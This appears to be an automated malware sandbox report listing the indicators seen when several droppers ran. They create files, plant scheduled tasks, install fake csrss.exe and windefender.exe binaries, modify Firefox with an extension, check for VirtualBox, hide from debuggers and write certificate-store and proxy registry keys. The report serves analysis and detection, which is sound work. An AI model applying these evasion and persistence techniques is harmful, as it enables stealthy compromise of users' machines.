File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\mVqQIGUXDOgrC\feITmxR.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\NANOZXe.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\lwnFiLS.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\tnLDIQD.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\UnqLSRy.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\LjcpulfHaxToA.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\ASJceUC.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\jplHxo.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files (x86)\gbPxNkbXHfUn\qQKFSEI.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\FTXCzbcEvROqagNdd.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
File created C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
File opened for modification C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\mRaseIvrfxDtBOYKW.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1662 = "Bahia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1801 = "Line Islands Daylight Time" C:\Windows\windefender.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ec